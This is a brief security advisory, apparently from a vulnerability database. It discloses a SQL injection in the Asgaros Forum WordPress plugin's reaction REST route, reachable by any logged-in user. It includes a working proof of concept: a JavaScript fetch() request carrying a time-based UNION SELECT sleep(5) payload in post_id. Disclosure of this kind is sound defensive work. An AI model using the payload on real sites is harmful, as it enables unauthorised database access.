The plugin does not sanitise and escape the post_id parameter before using it in a SQL statement via a REST route of the plugin (accessible to any authenticated user), leading to a SQL injection
As any authenticated user, such as subscriber To get the nonce: /wp-admin/admin-ajax.php?action=rest-nonce fetch("?rest_route=/asgaros-forum/v1/reaction/1/hello", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": "post_id=1 UNION SELECT 1, 1, 1, 1, 1,2,3,4,5,sleep(5) FROM dual -- g&_wpnonce=59c63b25b1", "method": "POST", "credentials": "include" }).then(response => response.text()) .then(data => console.log(data));
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-31 (about 1 years ago)
2022-01-31 (about 1 years ago)
2022-04-12 (about 9 months ago)